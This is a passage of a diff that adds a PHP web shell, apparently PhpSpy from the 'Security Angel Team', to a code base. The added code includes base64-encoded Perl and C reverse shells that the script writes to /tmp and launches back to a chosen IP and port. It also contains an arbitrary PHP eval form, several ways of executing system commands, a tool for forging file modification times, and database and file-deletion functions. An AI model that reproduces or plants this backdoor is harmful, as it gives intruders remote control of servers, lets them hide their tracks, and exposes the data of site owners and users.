+								p('<td><b>'.$row['name'].'</b><br />'.$row['type'].'('.$row['length'].')'.($row['colstat'] ? '<br /><b>PRIMARY</b>' : '').($row['autoval'] ? ' <br /><b>Auto</b>' : '').'</td><td><textarea class="area" name="insertsql['.$row['name'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+							}
+						}
+						if ($doing == 'insert') {
+							p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+						} else {
+							p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+							makehide('base64', $base64);
+						}
+						p('</table></form>');
+					} else {
+						$querys = @explode(';',$sql_query);
+						foreach($querys as $num=>$query) {
+							if ($query) {
+								p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+								switch(msqy($query))
+								{
+									case 0:
+										p('<h2>Error : '.msmsg().'</h2>');
+										break;	
+									case 1:
+										if (strtolower(substr($query,0,13)) == 'select * from') {
+											$allowedit = 1;
+										}
+										if ($getnumsql) {
+											$tatol = mssql_fetch_array(msq("SELECT count(*) FROM $tablename"));
+											$tatol = $tatol[0];
+											$multipage = multi($tatol, $pagenum, $page, $tablename);
+										}
+										if (!$tablename) {
+											$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+											$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+											preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+											$tablename = $matches[1][0];
+										}
+										p($multipage);
+										p('<table border="0" cellpadding="3" cellspacing="0">');
+										p('<tr class="head">');
+										if ($allowedit) p('<td>Action</td>');
+
+										$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
+										$rowdb = array();
+										$keyfied = ''; //Ö÷¼ü×Ö¶Î
+										while($tb = @mssql_fetch_array($result)) {
+											p('<td nowrap>'.$tb['name'].'<br><span>'.$tb['type'].'('.$tb['length'].') '.($tb['colstat'] ? '<b> - PRIMARY</b>' : '').($tb['autoval'] ? '<b> - Auto</b>' : '').'</span></td>');
+											$rowdb[$tb['name']]['Key'] = $tb['colstat'];
+											$rowdb[$tb['name']]['Auto'] = $tb['autoval'];
+											if ($tb['colstat']) {
+												$keyfied = $tb['name'];
+											}
+										}
+										p('</tr>');
+										
+										//Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
+										if (strtolower(substr($query,0,13)) == 'select * from') {
+											$query .= " order by $keyfied DESC";
+										}
+
+										$result = msq($query);
+										$index=0;
+										if($pagenum>0) mssql_data_seek($result,$start_limit);
+										while($mn = @mssql_fetch_assoc($result)){
+											if($index>$pagenum-1) break;
+
+											$thisbg = bg();
+											p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+											$where = $tmp = $b1 = '';
+											//Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
+											foreach($mn as $key=>$inside){
+												if ($inside) {
+													//²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
+													if ($rowdb[$key]['Key'] == 1 || $rowdb[$key]['Auto'] == 1) {
+														$where = $key."='".addslashes($inside)."'";
+														break;
+													}
+													$where .= $tmp.$key."='".addslashes($inside)."'";
+													$tmp = ' AND ';
+												}
+											}
+											//¶ÁÈ¡¼Ç¼ÓÃ
+											foreach($mn as $key=>$inside){
+												$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+											}
+											$where = base64_encode($where);
+
+											if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+											p($b1);
+											p('</tr>');
+											$index++;
+											unset($b1);
+										}
+										tbfoot();
+										p($multipage);
+										break;	
+									case 2:
+										$ar = mssql_affected_rows();
+										p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+										break;
+								}
+							}
+						}
+					}
+				} else {
+					$query = msq("select sysobjects.id,sysobjects.name,sysobjects.category,sysusers.name as owner,sysobjects.crdate from sysobjects join sysusers on sysobjects.uid = sysusers.uid where sysobjects.xtype = 'U' order by sysobjects.name asc");
+					$table_num = 0;
+					$tabledb = array();
+					while($table = mssql_fetch_array($query)) {
+						$table_num++;
+						$tabledb[] = $table;
+					}
+					unset($table);
+
+					p('<table border="0" cellpadding="0" cellspacing="0">');
+					p('<form action="'.$self.'" method="POST">');
+					makehide('action','mssqladmin');
+					p($dbform);
+					p('<tr class="head">');
+					p('<td>Name</td>');
+					p('<td>Owner</td>');
+					p('<td>Create_time</td>');
+					p('<td>Operate</td>');
+					p('</tr>');
+					foreach ($tabledb as $key => $table) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><a href="javascript:settable(\''.$table['owner'].'.'.$table['name'].'\');">'.$table['name'].'</a></td>');
+						p('<td>'.$table['owner'].'</td>');
+						p('<td>'.$table['crdate'].'</td>');
+						p('<td><a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'drop\');">Drop</a></td>');
+						p('</tr>');
+					}
+					p('<tr class='.bg().'>');
+					p('<td>Total tables: '.$table_num.'</td>');
+					p('<td colspan="3"></td>');
+					p('</tr>');
+					p("</table>");
+					msfr($query);
+				}
+			}
+		}
+	}
+	tbfoot();
+	if ($alreadymssql) {
+		@mssql_close();
+	}
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+	
+	goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+	goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2009 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+function dirsize($dir) { 
+	$dh = @opendir($dir);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $dir.'/'.$file;
+			if (@is_dir($path)) {
+				$size += dirsize($path);
+			} else {
+				$size += @filesize($path);
+			}
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// Ò³Ãæµ÷ÊÔÐÅÏ¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//Á¬½ÓMYSQLÊý¾Ý¿â
+function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	global $charsetdb;
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), $charsetdb)) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+//Á¬½ÓMSSQLÊý¾Ý¿â
+function msdbconn($dbhost,$dbuser,$dbpass,$dbname='') {
+	global $alreadymssql;
+	@ini_set('mssql.charset', 'UTF-8');
+	@ini_set('mssql.textlimit', 2147483647);
+	@ini_set('mssql.textsize', 2147483647);
+	$alreadymssql = 1;
+	if(!$link = @mssql_connect($dbhost, $dbuser, $dbpass, false)) {
+		p('<h2>'.msmsg().'</h2>');
+		$alreadymssql = 0;
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mssql_select_db($dbname, $link)) {
+			p('<h2>'.msmsg().'</h2>');
+			$alreadymssql = 0;
+			exit;
+		}
+	}
+	return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨÏÞ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýĿ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// »ñµÃÎļþÀ©Õ¹Ãû
+function getextension($filename) {
+	$pathinfo = pathinfo($filename);
+	return $pathinfo['extension'];
+}
+
+function GetWDirList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function GetWFileList($dir){
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
